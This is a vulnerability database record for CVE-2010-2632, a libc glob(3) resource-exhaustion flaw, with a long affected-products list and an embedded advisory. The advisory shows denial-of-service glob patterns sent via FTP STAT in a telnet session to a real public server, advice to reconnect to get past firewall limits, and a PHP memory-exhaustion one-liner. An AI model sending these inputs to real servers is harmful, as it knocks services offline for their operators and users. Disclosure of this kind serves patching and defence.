ID

VAR-E-201010-1183


CVE

cve_id:CVE-2010-2632

Trust: 2.9

cve_id:CVE-2011-0418

Trust: 1.8

cve_id:CVE-2010-4051

Trust: 1.5

cve_id:CVE-2010-4052

Trust: 1.5

cve_id:CVE-2011-3336

Trust: 1.0

sources: BID: 43819 // BID: 47671 // PACKETSTORM: 106589 // PACKETSTORM: 94556 // PACKETSTORM: 120032 // PACKETSTORM: 125725 // PACKETSTORM: 97315 // PACKETSTORM: 101052 // EXPLOIT-DB: 15215 // EDBNET: 38136

EDB ID

15215


TITLE

libc/glob(3) - Resource Exhaustion / Remote ftpd-anonymous (Denial of Service) - Multiple dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 15215

DESCRIPTION

libc/glob(3) - Resource Exhaustion / Remote ftpd-anonymous (Denial of Service). CVE-2010-2632CVE-68527 . dos exploit for Multiple platform

Trust: 0.6

sources: EXPLOIT-DB: 15215

AFFECTED PRODUCTS

vendor:multiplemodel:vendors libc/globscope: - version: -

Trust: 1.0

vendor:libc glob 3model: - scope: - version: -

Trust: 1.0

vendor:openbsdmodel:openbsdscope:eqversion:4.7

Trust: 0.9

vendor:netbsdmodel:netbsdscope:eqversion:5.0.2

Trust: 0.6

vendor:netbsdmodel:netbsdscope:eqversion:5.0

Trust: 0.6

vendor:freebsdmodel:8.2-stablescope: - version: -

Trust: 0.6

vendor:applemodel:mac os serverscope:eqversion:x10.6.5

Trust: 0.6

vendor:applemodel:mac os serverscope:eqversion:x10.5

Trust: 0.6

vendor:applemodel:mac osscope:eqversion:x10.5

Trust: 0.6

vendor:openbsdmodel:openbsdscope:eqversion:4.6

Trust: 0.6

vendor:openbsdmodel:openbsdscope:eqversion:4.5

Trust: 0.6

vendor:openbsdmodel:openbsdscope:eqversion:4.4

Trust: 0.6

vendor:bsdmodel:libc/regcompscope: - version: -

Trust: 0.5

vendor:freebsdmodel:ftpd remotescope:eqversion:9.1

Trust: 0.5

vendor:osmodel:safari firefox regexscope:eqversion:x//

Trust: 0.5

vendor:gnumodel:libc/regcompscope: - version: -

Trust: 0.5

vendor:tnftpdmodel:tnftpdscope:eqversion:20091122

Trust: 0.3

vendor:tnftpdmodel:tnftpdscope:eqversion:20081009

Trust: 0.3

vendor:tnftpdmodel:tnftpdscope:eqversion:20080929

Trust: 0.3

vendor:tnftpdmodel:tnftpdscope:eqversion:20080609

Trust: 0.3

vendor:sunmodel:solaris 9 x86scope: - version: -

Trust: 0.3

vendor:sunmodel:solaris 9 sparcscope: - version: -

Trust: 0.3

vendor:sunmodel:solaris 8 x86scope: - version: -

Trust: 0.3

vendor:sunmodel:solaris 8 sparcscope: - version: -

Trust: 0.3

vendor:sunmodel:solaris expressscope:eqversion:11

Trust: 0.3

vendor:sunmodel:solarisscope:eqversion:11

Trust: 0.3

vendor:sunmodel:solaris 10 x86scope: - version: -

Trust: 0.3

vendor:sunmodel:solaris 10 sparcscope: - version: -

Trust: 0.3

vendor:openbsdmodel:-currentscope: - version: -

Trust: 0.3

vendor:netbsdmodel:netbsdscope:eqversion:4.0.1

Trust: 0.3

vendor:netbsdmodel:currentscope: - version: -

Trust: 0.3

vendor:netbsdmodel:netbsdscope:eqversion:4.0

Trust: 0.3

vendor:junipermodel:networks junosscope:eqversion:10.4

Trust: 0.3

vendor:gnumodel:glibc2scope:eqversion:2.3.10

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.11.2

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.11.1

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.10.1

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.5

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.3.10

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.3.4

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.3.3

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.3.2

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.3.1

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.3

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.2.5

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.2.4

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.2.3

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.2.2

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.2.1

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.2

Trust: 0.3

vendor:gnumodel:glibc and greaterscope:eqversion:2.1.9

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.1.9

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.1.3-10

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.1.3

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.1.2

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.1.1-6

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.1.1

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.1

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.0.6

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.0.5

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.0.4

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.0.3

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.0.2

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.0.1

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.0

Trust: 0.3

vendor:gnumodel:glibcscope:eqversion:2.7

Trust: 0.3

vendor:gnumodel:cfenginescope:eqversion:1.2.3

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:6.0.x

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:6.0

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:6.0

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:5.5

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:5.5

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:5.4

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:5.4

Trust: 0.3

vendor:freebsdmodel:-prereleasescope:eqversion:5.4

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:5.3

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:5.3

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:5.3

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:5.3

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:5.2.1

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:5.2

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:5.2

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:5.2

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:5.1

Trust: 0.3

vendor:freebsdmodel:-release/alphascope:eqversion:5.1

Trust: 0.3

vendor:freebsdmodel:-release-p5scope:eqversion:5.1

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:5.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:5.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:5.0.x

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:5.0

Trust: 0.3

vendor:freebsdmodel:-release-p14scope:eqversion:5.0

Trust: 0.3

vendor:freebsdmodel:alphascope:eqversion:5.0

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:5.0

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:4.11

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:4.11

Trust: 0.3

vendor:freebsdmodel:-release-p3scope:eqversion:4.11

Trust: 0.3

vendor:freebsdmodel:-release-p20scope:eqversion:4.11

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:4.11

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:4.10

Trust: 0.3

vendor:freebsdmodel:-release-p8scope:eqversion:4.10

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:4.10

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:4.10

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:4.9

Trust: 0.3

vendor:freebsdmodel:-prereleasescope:eqversion:4.9

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:4.9

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:4.8

Trust: 0.3

vendor:freebsdmodel:-release-p7scope:eqversion:4.8

Trust: 0.3

vendor:freebsdmodel:-prereleasescope:eqversion:4.8

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:4.8

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:4.7

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:4.7

Trust: 0.3

vendor:freebsdmodel:-release-p17scope:eqversion:4.7

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:4.7

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:4.7

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:4.6.2

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:4.6

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:4.6

Trust: 0.3

vendor:freebsdmodel:-release-p20scope:eqversion:4.6

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:4.6

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:4.6

Trust: 0.3

vendor:freebsdmodel:-stablepre2002-03-07scope:eqversion:4.5

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:4.5

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:4.5

Trust: 0.3

vendor:freebsdmodel:-release-p32scope:eqversion:4.5

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:4.5

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:4.5

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:4.4

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:4.4

Trust: 0.3

vendor:freebsdmodel:-release-p42scope:eqversion:4.4

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:4.4

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:4.3

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:4.3

Trust: 0.3

vendor:freebsdmodel:-release-p38scope:eqversion:4.3

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:4.3

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:4.3

Trust: 0.3

vendor:freebsdmodel:-stablepre122300scope:eqversion:4.2

Trust: 0.3

vendor:freebsdmodel:-stablepre050201scope:eqversion:4.2

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:4.2

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:4.2

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:4.2

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:4.1.1

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:4.1.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:4.1.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:4.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:4.0.x

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:4.0

Trust: 0.3

vendor:freebsdmodel:alphascope:eqversion:4.0

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:4.0

Trust: 0.3

vendor:freebsdmodel:-stablepre2001-07-20scope:eqversion:3.5.1

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:3.5.1

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:3.5.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:3.5.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:3.5x

Trust: 0.3

vendor:freebsdmodel:-stablepre122300scope:eqversion:3.5

Trust: 0.3

vendor:freebsdmodel:-stablepre050201scope:eqversion:3.5

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:3.5

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:3.5

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:3.4x

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:3.4

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:3.3x

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:3.3

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:3.2x

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:3.2

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:3.1x

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:3.1

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:3.0

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:3.0

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.2.8

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.2.7

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.2.6

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.2.5

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.2.4

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.2.3

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.2.2

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.2x

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.2

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.1.7.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.1.7

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.1.6.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.1.6

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.1.5

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.1x

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.0.5

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.0

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:1.1.5.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:1.1.5

Trust: 0.3

vendor:freebsdmodel:9.0-stablescope: - version: -

Trust: 0.3

vendor:freebsdmodel:9.0-releasescope: - version: -

Trust: 0.3

vendor:freebsdmodel:9.0-rc3scope: - version: -

Trust: 0.3

vendor:freebsdmodel:9.0-rc1scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.2-release-p2scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.2-release-p1scope: - version: -

Trust: 0.3

vendor:freebsdmodel:release -p3scope:eqversion:8.2-

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:8.2

Trust: 0.3

vendor:freebsdmodel:8.1-release-p5scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.1-release-p4scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.1-releasescope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.1-prereleasescope: - version: -

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:8.1

Trust: 0.3

vendor:freebsdmodel:8.0-stablescope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.0-releasescope: - version: -

Trust: 0.3

vendor:freebsdmodel:7.4-release-p2scope: - version: -

Trust: 0.3

vendor:freebsdmodel:-release-p3scope:eqversion:7.4

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:7.4

Trust: 0.3

vendor:freebsdmodel:7.3-stablescope: - version: -

Trust: 0.3

vendor:freebsdmodel:7.3-release-p6scope: - version: -

Trust: 0.3

vendor:freebsdmodel:7.3-release-p1scope: - version: -

Trust: 0.3

vendor:freebsdmodel:release p7scope:eqversion:7.3--

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:7.3

Trust: 0.3

vendor:freebsdmodel:7.2-stablescope: - version: -

Trust: 0.3

vendor:freebsdmodel:7.2-release-p4scope: - version: -

Trust: 0.3

vendor:freebsdmodel:7.2-release-p1scope: - version: -

Trust: 0.3

vendor:freebsdmodel:7.2-rc2scope: - version: -

Trust: 0.3

vendor:freebsdmodel:7.2-prereleasescope: - version: -

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:7.2

Trust: 0.3

vendor:freebsdmodel:7.1-stablescope: - version: -

Trust: 0.3

vendor:freebsdmodel:7.1-release-p6scope: - version: -

Trust: 0.3

vendor:freebsdmodel:7.1-release-p5scope: - version: -

Trust: 0.3

vendor:freebsdmodel:7.1-release-p4scope: - version: -

Trust: 0.3

vendor:freebsdmodel:-release-p2scope:eqversion:7.1

Trust: 0.3

vendor:freebsdmodel:-release-p1scope:eqversion:7.1

Trust: 0.3

vendor:freebsdmodel:-pre-releasescope:eqversion:7.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:7.1

Trust: 0.3

vendor:freebsdmodel:7.0-stablescope: - version: -

Trust: 0.3

vendor:freebsdmodel:7.0-release-p8scope: - version: -

Trust: 0.3

vendor:freebsdmodel:7.0-release-p3scope: - version: -

Trust: 0.3

vendor:freebsdmodel:7.0-release-p12scope: - version: -

Trust: 0.3

vendor:freebsdmodel:7.0-release-p11scope: - version: -

Trust: 0.3

vendor:freebsdmodel:7.0-releasescope: - version: -

Trust: 0.3

vendor:freebsdmodel:beta4scope:eqversion:7.0

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:7.0

Trust: 0.3

vendor:freebsdmodel:-release-p9scope:eqversion:7.0

Trust: 0.3

vendor:freebsdmodel:-prereleasescope:eqversion:7.0

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:7.0

Trust: 0.3

vendor:freebsdmodel:6.4-relengscope: - version: -

Trust: 0.3

vendor:freebsdmodel:6.4-release-p5scope: - version: -

Trust: 0.3

vendor:freebsdmodel:6.4-release-p4scope: - version: -

Trust: 0.3

vendor:freebsdmodel:6.4-release-p2scope: - version: -

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:6.4

Trust: 0.3

vendor:freebsdmodel:-release-p3scope:eqversion:6.4

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:6.4

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:6.4

Trust: 0.3

vendor:freebsdmodel:6.3-release-p11scope: - version: -

Trust: 0.3

vendor:freebsdmodel:6.3-release-p10scope: - version: -

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:6.3

Trust: 0.3

vendor:freebsdmodel:-release-p9scope:eqversion:6.3

Trust: 0.3

vendor:freebsdmodel:-release-p8scope:eqversion:6.3

Trust: 0.3

vendor:freebsdmodel:-release-p6scope:eqversion:6.3

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:6.3

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:6.2

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:6.2

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:6.2

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:6.1

Trust: 0.3

vendor:freebsdmodel:-release-p10scope:eqversion:6.1

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:6.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:6.1

Trust: 0.3

vendor:freebsdmodel:6.0-relengscope: - version: -

Trust: 0.3

vendor:freebsdmodel:-release-p5scope:eqversion:6.0

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:6.0

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:5.5

Trust: 0.3

vendor:freebsdmodel:5.4-stablescope: - version: -

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:5.4

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:5.2.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:4.11

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.2.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:2.0.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:1.5

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:1.2

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:1.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:1.0

Trust: 0.3

vendor:avayamodel:cms serverscope:eqversion:16.2

Trust: 0.3

vendor:avayamodel:cms serverscope:eqversion:16.1

Trust: 0.3

vendor:avayamodel:cms serverscope:eqversion:16.0

Trust: 0.3

vendor:avayamodel:cms serverscope:eqversion:15.0

Trust: 0.3

vendor:avayamodel:ip deskphonescope:eqversion:96x16

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.6

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.4

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.3

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.2

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.1

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.5.8

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.5.7

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.5.6

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.5.5

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.5.4

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.5.3

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.5.2

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.5.1

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.7

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.5

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.4

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.3

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.2

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.1

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.8

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.7

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.6

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.5

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.4

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.3

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.2

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.1

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6

Trust: 0.3

vendor:freebsdmodel:8.3-stablescope:neversion: -

Trust: 0.3

vendor:freebsdmodel:7.4-stablescope:neversion: -

Trust: 0.3

vendor:applemodel:mac os serverscope:neversion:x10.6.8

Trust: 0.3

vendor:pureftpdmodel:pure-ftpdscope:eqversion:1.0.31

Trust: 0.3

vendor:pureftpdmodel:pure-ftpdscope:eqversion:1.0.30

Trust: 0.3

vendor:pureftpdmodel:pure-ftpdscope:eqversion:1.0.29

Trust: 0.3

vendor:openbsdmodel:openbsdscope:eqversion:4.8

Trust: 0.3

vendor:openbsdmodel:openbsdscope:eqversion:4.3

Trust: 0.3

vendor:openbsdmodel:openbsdscope:eqversion:4.2

Trust: 0.3

vendor:openbsdmodel:openbsdscope:eqversion:4.1

Trust: 0.3

vendor:openbsdmodel:openbsdscope:eqversion:4.0

Trust: 0.3

vendor:netbsdmodel:netbsdscope:eqversion:5.0.1

Trust: 0.3

vendor:netbsdmodel:netbsdscope:eqversion:5.1

Trust: 0.3

vendor:netbsdmodel:rc3scope:eqversion:5.0

Trust: 0.3

vendor:mandrivamodel:linux mandrake x86 64scope:eqversion:2010.1

Trust: 0.3

vendor:mandrivamodel:linux mandrakescope:eqversion:2010.1

Trust: 0.3

vendor:mandrivamodel:linux mandrake x86 64scope:eqversion:2009.0

Trust: 0.3

vendor:mandrivamodel:linux mandrakescope:eqversion:2009.0

Trust: 0.3

vendor:mandrakesoftmodel:enterprise server x86 64scope:eqversion:5

Trust: 0.3

vendor:mandrakesoftmodel:enterprise serverscope:eqversion:5

Trust: 0.3

vendor:mandrakesoftmodel:corporate server x86 64scope:eqversion:4.0

Trust: 0.3

vendor:mandrakesoftmodel:corporate serverscope:eqversion:4.0

Trust: 0.3

vendor:gentoomodel:linuxscope: - version: -

Trust: 0.3

vendor:pureftpdmodel:pure-ftpdscope:neversion:1.0.32

Trust: 0.3

sources: BID: 43819 // BID: 47671 // PACKETSTORM: 106589 // PACKETSTORM: 94556 // PACKETSTORM: 120032 // PACKETSTORM: 125725 // PACKETSTORM: 97315 // PACKETSTORM: 101052 // EXPLOIT-DB: 15215

EXPLOIT

Source: http://securityreason.com/securityalert/7822

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ Multiple Vendors libc/glob(3) resource exhaustion (+0day remote
ftpd-anon) ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 06.11.2009
- - Pub.: 07.10.2010

CVE: CVE-2010-2632

Affected Software (verified):
- - OpenBSD 4.7
- - NetBSD 5.0.2
- - FreeBSD 7.3/8.1
- - Oracle Sun Solaris 10
- - GNU Libc (glibc)

Affected Ftp Servers:
- - ftp.openbsd.org (verified 02.07.2010: "connection refused" and ban)
- - ftp.netbsd.org (verified 02.07.2010: "connection limit of 160 reached"
and ban)
- - ftp.freebsd.org
- - ftp.adobe.com
- - ftp.hp.com
- - ftp.sun.com
- - more more and more

Affected Vendors (not verified):
- - Apple
- - Microsoft Interix
- - HP
- - more more more

Original URL:
http://securityreason.com/achievement_securityalert/89

- --- 0.Description ---

#include <glob.h>

int glob(const char *pattern, int flags,
int (*errfunc)(const char *epath, int eerrno), glob_t *pglob);

Description

This function expands a filename wildcard which is passed as pattern.

GLOB_LIMIT Limit the amount of memory used by matches to
ARG_MAX.
This option should be set for programs that can be
coerced to a denial of service attack via patterns
that
expand to a very large number of matches, such as a
long
string of */../*/..

- --- 1. Multiple Vendors libc/glob(3) resource exhaustion ---
As we can read in definition GLOB_LIMIT:

- --
Limit the amount of memory used by matches to ARG_MAX. This option should
be set for programs that can be coerced to a denial of service attack via
patterns that expand to a very large number of mat
ches, such as a long string of */../*/..
- ---

but now is comming question "what will happen when we use */.. without
matching any results (simple searching)?" GLOB_LIMIT will be not
overflowed. To realize it, we need only use pattern with many
*/.. and many inodes in current directory. On the end of pattern, we need
add some not existed filename (like /cxib*).
If we don't have many files or directories in attacked direcotry, we need
create some dir-structure.

Let's see again:
http://cvsweb.netbsd.org/bsdweb.cgi/src/libexec/ftpd/ftpd.c?rev=1.61.2.5&co
ntent-type=text/x-cvsweb-markup

GLOB_LIMIT

protect us before attacks like

*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*

because glob will find more patches as in GLOB_LIMIT declared. Anyway, if
we use path what do not exists (with */.. strings) like

*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*blablahaha

GLOB_LIMIT will be never overflowed. Many combinations of paths, will
execute this proces a long time. We can also try allocate
(GLOB_LIMIT-1)*MAXPATHNAMELEN bytes per one process. ~200~300MB

Example:
> telnet ftp.netbsd.org 21
Trying 204.152.190.15...
Connected to ftp.netbsd.org.
Escape character is '^]'.
220 ftp.NetBSD.org FTP server (NetBSD-ftpd 20100320) ready.
user anonymous
331 Guest login ok, type your name as password.
pass anon@cxib
230-
The NetBSD Project FTP Server located in Redwood City, CA, USA
...
230-
EXPORT NOTICE

...
230 Guest login ok, access restrictions apply.
stat
{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}
/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx

this request will generate 100% usage of process a long time. ftpd come
into glob(3) and will not fast out. Very similar sympthon was described in
vulnerability for glibc strfmon(3)

- - http://securityreason.com/achievement_securityalert/67 --
...
Interesting is that the PHP memory_limit has no control over what will
happens in the level of the libc. Function strfmon(3) can allocate a lot
of
data in memory without control by PHP memory_limit.

For example:
php -r 'money_format("%.1343741821i",1);'

will allocate ~1049MB real memory.
memory_limit can be less that 1049M
...
- - http://securityreason.com/achievement_securityalert/67 --

ftpd also dosen't control what will happen in libc.

so it is enough to send
- ---
USER anonymous
PASS
STAT */..[calculated pattern]
- ---

and disconnect to connect again (bypass firewall limits). In php we can
also bypass max_memory_limit by libc vulns.

Attacking machine in this way, we can call the various side effects.

- -kernel panic in netbsd502---
Jul 5 10:18:13 dhclient: DHCPACK from 192.168.92.254
Jul 5 10:18:14 dhclient: bound to 192.168.92.171 -- renewal in 886
seconds.
Jul 5 10:22:43 syslogd: restart
Jul 5 10:22:43 /netbsd: uvm_fault(0xcc2eb35c, 0, 2) -> 0xe
Jul 5 10:22:43 /netbsd: fatal page fault in supervisor mode
Jul 5 10:22:43 /netbsd: trap type 6 code 2 eip c07d9784 cs 8 eflags 10206
cr2 0 ilevel 0
Jul 5 10:22:43 /netbsd: panic: trap
